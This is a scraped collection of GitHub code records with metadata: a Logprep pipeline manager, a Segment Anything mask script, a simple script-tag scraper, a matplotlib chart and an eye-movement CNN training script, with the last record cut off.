self._configuration = configuration\n\n manager = multiprocessing.Manager()\n self._shared_dict = manager.dict()\n self._used_server_ports = manager.dict()\n for idx in range(configuration.get(\"process_count\", 1)):\n self._shared_dict[idx] = None\n prometheus_config = configuration.get(\"metrics\", {})\n if prometheus_config.get(\"enabled\", False):\n self.prometheus_exporter = PrometheusStatsExporter(prometheus_config, self._logger)\n\n def get_count(self) -> int:\n \"\"\"Get the pipeline count.\n\n Returns\n -------\n int\n The current number of pipelines.\n\n \"\"\"\n self._logger.debug(f\"Getting pipeline count: {len(self._pipelines)}\")\n return len(self._pipelines)\n\n def set_count(self, count: int):\n \"\"\"Set the pipeline count.\n\n Parameters\n ----------\n count : int\n The pipeline count will be incrementally changed until it reaches this value.\n\n \"\"\"\n if count < len(self._pipelines):\n self._decrease_to_count(count)\n else:\n self._increase_to_count(count)\n\n def _increase_to_count(self, count: int):\n while len(self._pipelines) < count:\n new_pipeline_index = len(self._pipelines) + 1\n self._pipelines.append(self._create_pipeline(new_pipeline_index))\n self._pipelines[-1].start()\n\n def _decrease_to_count(self, count: int):\n while len(self._pipelines) > count:\n pipeline = self._pipelines.pop()\n pipeline.stop()\n pipeline.join()\n\n def restart_failed_pipeline(self):\n \"\"\"Restart any pipelines that have died.\"\"\"\n failed_pipelines = [pipeline for pipeline in self._pipelines if not pipeline.is_alive()]\n for failed_pipeline in failed_pipelines:\n self._pipelines.remove(failed_pipeline)\n if self.prometheus_exporter is None:\n continue\n self.prometheus_exporter.remove_metrics_from_process(failed_pipeline.pid)\n\n if failed_pipelines:\n self.set_count(self._configuration.get(\"process_count\"))\n self._logger.warning(f\"Restarted {len(failed_pipelines)} failed pipeline(s)\")\n\n def stop(self):\n \"\"\"Stop processing any pipelines by reducing the pipeline count to zero.\"\"\"\n self._decrease_to_count(0)\n\n def _create_pipeline(self, index) -> MultiprocessingPipeline:\n if self._configuration is None:\n raise MustSetConfigurationFirstError(\"create new pipeline\")\n\n self._logger.info(\"Created new pipeline\")\n return MultiprocessingPipeline(\n pipeline_index=index,\n config=self._configuration,\n log_queue=self.log_queue,\n lock=self._lock,\n shared_dict=self._shared_dict,\n used_server_ports=self._used_server_ports,\n prometheus_exporter=self.prometheus_exporter,\n )\n", "repo_name": "fkie-cad/Logprep", "sub_path": "logprep/framework/pipeline_manager.py", "file_name": "pipeline_manager.py", "file_ext": "py", "file_size_in_byte": 4383, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 19, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 29, "usage_type": "call"}, {"api_name": "multiprocessing.Queue", "line_number": 30, "usage_type": "call"}, {"api_name": "logging.handlers.QueueListener", "line_number": 31, "usage_type": "call"}, {"api_name": "logging.handlers", "line_number": 31, "usage_type": "attribute"}, {"api_name": "multiprocessing.Lock", "line_number": 37, "usage_type": "call"}, {"api_name": "logprep.util.configuration.Configuration", "line_number": 41, "usage_type": "name"}, {"api_name": "multiprocessing.Manager", "line_number": 45, "usage_type": "call"}, {"api_name": "logprep.util.prometheus_exporter.PrometheusStatsExporter", 
"line_number": 52, "usage_type": "call"}, {"api_name": "logprep.framework.pipeline.MultiprocessingPipeline", "line_number": 114, "usage_type": "call"}, {"api_name": "logprep.framework.pipeline.MultiprocessingPipeline", "line_number": 109, "usage_type": "name"}]} +{"seq_id": "22912184841", "text": "import cv2\nfrom segment_anything import SamPredictor, sam_model_registry, SamAutomaticMaskGenerator\nimport argparse\nimport json\nimport os\nimport numpy as np\nimport torch\nfrom typing import Any, Dict, List\n\ndef write_masks_to_folder(masks: List[Dict[str, Any]], path: str) -> None:\n header = \"id,area,bbox_x0,bbox_y0,bbox_w,bbox_h,point_input_x,point_input_y,predicted_iou,stability_score,crop_box_x0,crop_box_y0,crop_box_w,crop_box_h\" # noqa\n metadata = [header]\n for i, mask_data in enumerate(masks):\n mask = mask_data[\"segmentation\"]\n filename = f\"{i}.png\"\n cv2.imwrite(os.path.join(path, filename), mask * 255)\n mask_metadata = [\n str(i),\n str(mask_data[\"area\"]),\n *[str(x) for x in mask_data[\"bbox\"]],\n *[str(x) for x in mask_data[\"point_coords\"][0]],\n str(mask_data[\"predicted_iou\"]),\n str(mask_data[\"stability_score\"]),\n *[str(x) for x in mask_data[\"crop_box\"]],\n ]\n row = \",\".join(mask_metadata)\n metadata.append(row)\n metadata_path = os.path.join(path, \"metadata.csv\")\n with open(metadata_path, \"w\") as f:\n f.write(\"\\n\".join(metadata))\n\n return\n\n\nimage = cv2.imread('img_00024.jpg')\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n# with open('../viewerout/landmarks/img_00024.json') as f:\n# data = json.load(f) \n# lanndmarks3D =np.array(data['frontLandmarks3d'])\n# lanndmarks2D = lanndmarks3D[:,0:2].astype(int)\n# promptPts0=lanndmarks2D\n# promptLabels0=np.ones(promptPts0.shape[0],dtype=int) \n \n\n\nsam = sam_model_registry[\"vit_h\"](checkpoint=\"sam_vit_h_4b8939.pth\")\npredictor = SamPredictor(sam)\npredictor.set_image(image)\n\npromptPts0=np.array([[364,254],[456,289]])\npromptLabels0=np.array([1,1])\ninput_box = np.array([278,192, 472,459])\n\nmasks, scores, logits = predictor.predict(promptPts0,promptLabels0,box=input_box[None, :]) \nprint('scores=',scores) \ncv2.imwrite(\"00.png\", masks[0] * 255)\ncv2.imwrite(\"01.png\", masks[1] * 255) \ncv2.imwrite(\"02.png\", masks[2] * 255) \n\n#mask_generator = SamAutomaticMaskGenerator(sam)\n#masks = mask_generator.generate(image)\n#write_masks_to_folder(masks,'./1')\n\n\n \n", "repo_name": "calipos/mvs_mvg_bat", "sub_path": "segmentAnything/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 2165, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "typing.List", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 10, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 36, "usage_type": "attribute"}, {"api_name": "segment_anything.sam_model_registry", "line_number": 46, "usage_type": "name"}, 
{"api_name": "segment_anything.SamPredictor", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 52, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 57, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "37018754749", "text": "#importing modules\n\nfrom bs4 import BeautifulSoup\n\nimport time\n\nfrom time import sleep\n\nimport requests\n\nimport csv\n\nimport os\n\n#function to make requests\n\ndef makerequest(url):\n\n\t#making a request\n\n\tpage = requests.get( url )\n\n\t#checking for 429 response\n\n\tif page.status_code == 429:\n\n\t\tprint('429 error ! trying again after' + page.headers[\"Retry-After\"] + 'seconds')\n\n\t\ttime.sleep(int(page.headers[\"Retry-After\"]))\n\n\t\tpage = requests.get( url )\n\n\treturn(page)\n\n#function to import js url's in a given url\n\ndef jsurl(url):\n\t\n\tpage = makerequest(url)\n\n\tsoup = BeautifulSoup(page.content , 'html.parser')\n\n\tprint(soup.prettify())\n\n\tjsurl = soup.find_all('script')\n\n\tprint(jsurl.prettify())\n\n\treturn(jsurl)\n\n\n#main function\n\ndef main():\n\n\tinputurl = input('\\nEnter the url : ')\n\n\tscrappedurls = jsurl(inputurl)\n\n\tprint(scrappedurls)\n\nmain()", "repo_name": "santhosh-duraipandiyan/Python_Scripts", "sub_path": "js.py", "file_name": "js.py", "file_ext": "py", "file_size_in_byte": 841, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "requests.get", "line_number": 21, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 29, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 31, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "31631709611", "text": "# -*- coding: utf-8 -*-\r\nimport numpy as np \r\n\r\nfrom matplotlib import pyplot as plt\r\nfrom matplotlib import mlab\r\nfrom matplotlib.ticker import MultipleLocator, FormatStrFormatter \r\nfrom pylab import * \r\nmatplotlib.rcParams['font.sans-serif'] = ['SimHei']\r\nmatplotlib.rcParams['font.family']='sans-serif'\r\n\r\nfont = {'family' : 'sans-serif', \r\n 'color' : 'darkred', \r\n 'weight' : 'normal', \r\n 'size' : 12, \r\n } \r\nfont_text = {'family' : 'sans-serif', \r\n 'color' : 'darkred', \r\n 'weight' : 'normal', \r\n 'size' : 10, \r\n }\r\nfig, ax = plt.subplots()\r\n\r\nY = [0.96, 0.97, 0.80, 0.82, 0.81, 0.83]\r\nX = np.arange(len(Y))\r\nplt.bar(X, Y, width = 0.5, facecolor = 'lightskyblue')\r\n# plt.bar(X + 0.36,Y2, width = 0.35, facecolor = 'yellowgreen', label=\"Our method\")\r\n# 水平柱状图plt.barh,属性中宽度width变成了高度height\r\n# 打两组数据时用+\r\n# facecolor柱状图里填充的颜色\r\n# edgecolor是边框的颜色\r\n# 想把一组数据打到下边,在数据前使用负号\r\n# plt.bar(X, -Y2, width=width, facecolor='#ff9999', edgecolor='white')\r\n# 给图加text\r\nlabel = [\"文本\", \"图片\", \"发送红包\", \"接收红包\", \"发送转账\", \"接收转账\"]\r\nfor x,y in zip(X,Y):\r\n plt.text(x, y+0.01, '%.2f' % y, ha='center', va= 'bottom', fontdict=font_text)\r\n# for x,y in zip(X,Y2):\r\n# plt.text(x+0.35, y, '%.2f' % y, ha='center', va= 'bottom', fontdict=font_text)\r\n\r\nplt.legend(loc='upper left') # , bbox_to_anchor=(0.9,0.1)\r\nplt.xticks(range(len(Y)), label)\r\nplt.ylim(0,+1.05)\r\nplt.xlabel('微信用户行为', fontdict=font)\r\nplt.ylabel('准确率', 
fontdict=font)\r\nplt.savefig(\"dialog_acc.jpg\")\r\n# plt.ylabel('召回率', fontdict=font)\r\n# plt.savefig(\"dialog_rec.jpg\")\r\n# plt.ylabel('F1值', fontdict=font)\r\n# plt.savefig(\"dialog_f1.jpg\")", "repo_name": "yfp16/WeChat", "sub_path": "paper.py", "file_name": "paper.py", "file_ext": "py", "file_size_in_byte": 1835, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "86", "api": [{"api_name": "matplotlib.rcParams", "line_number": 8, "usage_type": "attribute"}, {"api_name": "matplotlib.rcParams", "line_number": 9, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}]} +{"seq_id": "25420332774", "text": "import os\nimport numpy as np\nimport shutil\nimport cv2\nfrom google.colab.patches import cv2_imshow\n\n#DATASET PARTITIONING\n\nroot_dir='resized eyes'\ncentreposCls = '/resizedcentreimages' \nleftposCls = '/resizedleftimages' \nrightposCls = '/resizedrightimages' \n\nos.makedirs('Train'+ centreposCls)\nos.makedirs('Train'+ leftposCls)\nos.makedirs('Train'+ rightposCls)\nos.makedirs('Validation'+ centreposCls)\nos.makedirs('Validation'+ leftposCls)\nos.makedirs('Validation'+ rightposCls)\nos.makedirs('Test'+ centreposCls)\nos.makedirs('Test'+ leftposCls)\nos.makedirs('Test'+ rightposCls)\n\nos.makedirs('Train1'+ centreposCls)\nos.makedirs('Train1'+ leftposCls)\nos.makedirs('Train1'+ rightposCls)\nos.makedirs('Validation1'+ centreposCls)\nos.makedirs('Validation1'+ leftposCls)\nos.makedirs('Validation1'+ rightposCls)\nos.makedirs('Test1'+ centreposCls)\nos.makedirs('Test1'+ leftposCls)\nos.makedirs('Test1'+ rightposCls)\n\n\ncurrentCls=centreposCls\nsrc='/content/drive/My Drive/FINAL2'+currentCls \nallImageNames=os.listdir(src) \nnp.random.shuffle(allImageNames)\ntraining_imagenames,validation_imagenames,test_imagenames=np.split(np.array(allImageNames),\n\t\t\t\t[int(len(allImageNames)*0.8),int(len(allImageNames)*0.9)])\ntraining_imagenames=[src+'/'+ name for name in training_imagenames.tolist()] \nvalidation_imagenames=[src+'/'+ name for name in 
validation_imagenames.tolist()]\ntest_imagenames=[src+'/'+ name for name in test_imagenames.tolist()]\nprint('Total images:',len(allImageNames))\nprint('Training:',len(training_imagenames))\nprint('Validation:',len(validation_imagenames))\nprint('Testing:',len(test_imagenames))\n\nfor name in training_imagenames:\n shutil.copy(name,'Train/'+ currentCls)\nfor name in validation_imagenames:\n shutil.copy(name,'Validation/'+ currentCls)\nfor name in test_imagenames:\n shutil.copy(name,'Test/'+ currentCls)\n\ncurrentCls=leftposCls\nsrc='/content/drive/My Drive/FINAL2'+currentCls \nallImageNames=os.listdir(src) \nnp.random.shuffle(allImageNames) \ntraining_imagenames,validation_imagenames,test_imagenames=np.split(np.array(allImageNames),\n\t\t\t\t[int(len(allImageNames)*0.8),int(len(allImageNames)*0.9)])\ntraining_imagenames=[src+'/'+ name for name in training_imagenames.tolist()] \nvalidation_imagenames=[src+'/'+ name for name in validation_imagenames.tolist()]\ntest_imagenames=[src+'/'+ name for name in test_imagenames.tolist()]\n\nprint('Total images:',len(allImageNames))\nprint('Training:',len(training_imagenames))\nprint('Validation:',len(validation_imagenames))\nprint('Testing:',len(test_imagenames))\n\nfor name in training_imagenames:\n shutil.copy(name,'Train/'+ currentCls)\nfor name in validation_imagenames:\n shutil.copy(name,'Validation/'+ currentCls)\nfor name in test_imagenames:\n shutil.copy(name,'Test/'+ currentCls)\n\n\ncurrentCls=rightposCls\nsrc='/content/drive/My Drive/FINAL2/resizedrightimages'\nallImageNames=os.listdir(src) \nnp.random.shuffle(allImageNames) \ntraining_imagenames,validation_imagenames,test_imagenames=np.split(np.array(allImageNames),\n\t\t\t\t[int(len(allImageNames)*0.8),int(len(allImageNames)*0.9)])\ntraining_imagenames=[src+'/'+ name for name in training_imagenames.tolist()]\nvalidation_imagenames=[src+'/'+ name for name in validation_imagenames.tolist()]\ntest_imagenames=[src+'/'+ name for name in test_imagenames.tolist()]\n\nprint('Total images:',len(allImageNames))\nprint('Training:',len(training_imagenames))\nprint('Validation:',len(validation_imagenames))\nprint('Testing:',len(test_imagenames))\n\nfor name in training_imagenames:\n shutil.copy(name,'Train/'+ currentCls)\nfor name in validation_imagenames:\n shutil.copy(name,'Validation/'+ currentCls)\nfor name in test_imagenames:\n shutil.copy(name,'Test/'+ currentCls)\n\n\n\ndirectory = '/content/Train/resizedcentreimages'\nfor file in os.listdir(directory):\n img_path = os.path.join(directory, file)\n img = cv2.imread(img_path,0)\n img = cv2.resize(img, (50, 50)) \n equ = cv2.equalizeHist(img)\n cv2.imwrite('/content/Train1/resizedcentreimages/' + file + '_hist.jpg', equ) \n\n\ndirectory = '/content/Train/resizedleftimages'\nfor file in os.listdir(directory):\n img_path = os.path.join(directory, file)\n img = cv2.imread(img_path,0)\n img = cv2.resize(img, (50, 50))\n equ = cv2.equalizeHist(img)\n cv2.imwrite('/content/Train1/resizedleftimages/' + file + '_hist.jpg', equ) \n\n\ndirectory = '/content/Train/resizedrightimages'\nfor file in os.listdir(directory):\n img_path = os.path.join(directory, file)\n img = cv2.imread(img_path,0)\n img = cv2.resize(img, (50, 50))\n equ = cv2.equalizeHist(img)\n cv2.imwrite('/content/Train1/resizedrightimages/' + file + '_hist.jpg', equ)\n\n \ndirectory = '/content/Validation/resizedcentreimages'\nfor file in os.listdir(directory):\n img_path = os.path.join(directory, file)\n img = cv2.imread(img_path,0) \n img = cv2.resize(img, (50, 50))\n equ = 
cv2.equalizeHist(img)\n cv2.imwrite('/content/Validation1/resizedcentreimages/' + file + '_hist.jpg', equ) \n\n\ndirectory = '/content/Validation/resizedrightimages'\nfor file in os.listdir(directory):\n img_path = os.path.join(directory, file)\n img = cv2.imread(img_path,0) \n img = cv2.resize(img, (50, 50))\n equ = cv2.equalizeHist(img)\n cv2.imwrite('/content/Validation1/resizedrightimages/' + file + '_hist.jpg', equ) \n\n\ndirectory = '/content/Validation/resizedleftimages'\nfor file in os.listdir(directory):\n img_path = os.path.join(directory, file)\n img = cv2.imread(img_path,0)\n img = cv2.resize(img, (50, 50))\n equ = cv2.equalizeHist(img)\n cv2.imwrite('/content/Validation1/resizedleftimages/' + file + '_hist.jpg', equ) \n\n\ndirectory = '/content/Test/resizedrightimages'\nfor file in os.listdir(directory):\n img_path = os.path.join(directory, file)\n img = cv2.imread(img_path,0) \n img = cv2.resize(img, (50, 50))\n equ = cv2.equalizeHist(img)\n cv2.imwrite('/content/Test1/resizedrightimages/' + file + '_hist.jpg', equ) \n\n\ndirectory = '/content/Test/resizedleftimages'\nfor file in os.listdir(directory):\n img_path = os.path.join(directory, file)\n img = cv2.imread(img_path,0)\n img = cv2.resize(img, (50, 50))\n equ = cv2.equalizeHist(img)\n cv2.imwrite('/content/Test1/resizedleftimages/' + file + '_hist.jpg', equ)\n\n\ndirectory = '/content/Test/resizedcentreimages'\nfor file in os.listdir(directory):\n img_path = os.path.join(directory, file)\n img = cv2.imread(img_path,0)\n img = cv2.resize(img, (50, 50))\n equ = cv2.equalizeHist(img)\n cv2.imwrite('/content/Test1/resizedcentreimages/' + file + '_hist.jpg', equ)\n\n\n#MODEL CREATION AND TRAINING\n\nimport keras\nfrom keras.models import Sequential, Model\nfrom keras.layers import Conv2D, MaxPooling2D, Input\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom IPython.display import SVG\nfrom keras.utils.vis_utils import model_to_dot\n\n\nlenet = Sequential()\nlenet.add(Conv2D(24, kernel_size=(7, 7), activation='relu',\n input_shape=(50,50,3)))\nlenet.add(MaxPooling2D(pool_size=(2, 2)))\nlenet.add(Conv2D(24, (5, 5), activation='relu'))\nlenet.add(MaxPooling2D(pool_size=(2, 2)))\nlenet.add(Conv2D(24, (3, 3), activation='relu'))\nlenet.add(MaxPooling2D(pool_size=(2, 2)))\nlenet.add(Flatten())\nlenet.add(Dense(500, activation='relu'))\nlenet.add(Dense(3, activation='softmax'))\n\nSVG(model_to_dot(lenet,show_shapes=True, show_layer_names=False\n ).create(prog='dot', format='svg'))\nlenet.summary()\nlenet.compile(optimizer='adam',loss='categorical_crossentropy',metrics=['accuracy'])\n\n\n\nfrom keras.preprocessing.image import ImageDataGenerator \ntrain_datagen=ImageDataGenerator(rescale=1/255,\n shear_range=0.2,\n zoom_range=0.2,\n brightness_range=[0.2,1.0],\n vertical_flip=True)\n\n\nvalidation_datagen=ImageDataGenerator(rescale=1/255)\ntest_datagen = ImageDataGenerator(rescale=1/255)\nbatchSize=5\ntraining_set=train_datagen.flow_from_directory( \n '/content/Train1',\n target_size=(50,50),\n batch_size=batchSize,\n class_mode='categorical')\nvalidation_set=validation_datagen.flow_from_directory( \n '/content/Validation1',\n target_size=(50,50),\n batch_size=batchSize,\n class_mode='categorical')\ntest_set = test_datagen.flow_from_directory(\n '/content/Test1',\n target_size=(50,50),\n batch_size=batchSize,\n class_mode='categorical')\nstepsnumperepochtraining=int(408/batchSize)\nstepsnumperepochvalidation=int(59/batchSize)\nstepsnumperepochtesting = int(118/batchSize)\nhistory = lenet.fit_generator( \n 
training_set,\n steps_per_epoch = stepsnumperepochtraining,\n epochs = 50,\n validation_data = validation_set,\n validation_steps = stepsnumperepochvalidation)\n\nlenet.save('eyeprojectmodel2.h5')\nfrom shutil import copyfile\ncopyfile('/content/eyeprojectmodel2.h5','/content/drive/My Drive/eyeprojectmodel/projectmodel2.h5') \n\n\n\n\n\n \n\n", "repo_name": "nimithathankachan/Eye-movement-classification-in-video", "sub_path": "3classmodelcreation/LEFTRIGHTCENTREMODELCREATION AND TRAINING.py", "file_name": "LEFTRIGHTCENTREMODELCREATION AND TRAINING.py", "file_ext": "py", "file_size_in_byte": 9151, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "os.makedirs", "line_number": 14, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 15, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 16, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 17, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 18, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 19, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 20, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 21, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 22, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 24, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 25, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 26, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 27, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 28, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 29, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 30, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 31, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 32, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.split", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 50, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 52, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 54, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.split", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 60, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 72, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 74, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 76, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.split", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 83, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 95, "usage_type": 
"call"}, {"api_name": "shutil.copy", "line_number": 97, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 99, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 106, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 107, "usage_type": "call"}, {"api_name": "cv2.equalizeHist", "line_number": 108, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 109, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 115, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 116, "usage_type": "call"}, {"api_name": "cv2.equalizeHist", "line_number": 117, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 118, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 123, "usage_type": "call"}, {"api_name": "os.path", "line_number": 123, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 124, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 125, "usage_type": "call"}, {"api_name": "cv2.equalizeHist", "line_number": 126, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 127, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 133, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 134, "usage_type": "call"}, {"api_name": "cv2.equalizeHist", "line_number": 135, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 136, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 142, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 143, "usage_type": "call"}, {"api_name": "cv2.equalizeHist", "line_number": 144, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 145, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 150, "usage_type": "call"}, {"api_name": "os.path", "line_number": 150, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 151, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 152, "usage_type": "call"}, {"api_name": "cv2.equalizeHist", "line_number": 153, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 154, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 160, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 161, "usage_type": "call"}, {"api_name": "cv2.equalizeHist", 
"line_number": 162, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 163, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 167, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 168, "usage_type": "call"}, {"api_name": "os.path", "line_number": 168, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 169, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 170, "usage_type": "call"}, {"api_name": "cv2.equalizeHist", "line_number": 171, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 172, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 177, "usage_type": "call"}, {"api_name": "os.path", "line_number": 177, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 178, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 179, "usage_type": "call"}, {"api_name": "cv2.equalizeHist", "line_number": 180, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 181, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 194, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 195, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 197, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 198, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 199, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 200, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 201, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 202, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 203, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 204, "usage_type": "call"}, {"api_name": "IPython.display.SVG", "line_number": 206, "usage_type": "call"}, {"api_name": "keras.utils.vis_utils.model_to_dot", "line_number": 206, "usage_type": 